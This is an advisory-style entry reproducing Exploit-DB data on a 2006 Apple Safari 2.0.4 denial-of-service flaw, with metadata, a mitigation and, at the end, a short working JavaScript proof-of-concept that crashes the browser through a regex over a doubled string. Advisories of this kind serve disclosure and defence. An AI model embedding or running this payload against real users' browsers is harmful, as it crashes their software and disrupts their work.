vendor: Safari
by: SecurityFocus
CVSS: 7.5 (HIGH)
Denial-of-Service
CWE: 400
Product Name: Safari
Affected Version From: Apple Safari 2.0.4
Affected Version To: Other versions may also be affected.
Patch Exists: Yes
Related CWE: N/A
CPE: apple:safari
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Apple Safari web browser Denial-of-Service Vulnerability

Apple Safari web browser is prone to a denial-of-service vulnerability when executing certain JavaScript code. An attacker can exploit this issue to crash an affected browser. Presumably, this issue may also result in remote code execution, but this has not been confirmed.

Mitigation:

Upgrade to the latest version of Apple Safari web browser.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/21053/info

Apple Safari web browser is prone to a denial-of-service vulnerability when executing certain JavaScript code.

An attacker can exploit this issue to crash an affected browser. Presumably, this issue may also result in remote code execution, but this has not been confirmed.

Apple Safari 2.0.4 is vulnerable to this issue; other versions may also be affected.

<script>
var reg = /(.)*/;
var z = 'Z';
while (z.length <= 8192) z+=z;
var boum = reg.exec(z);
</script>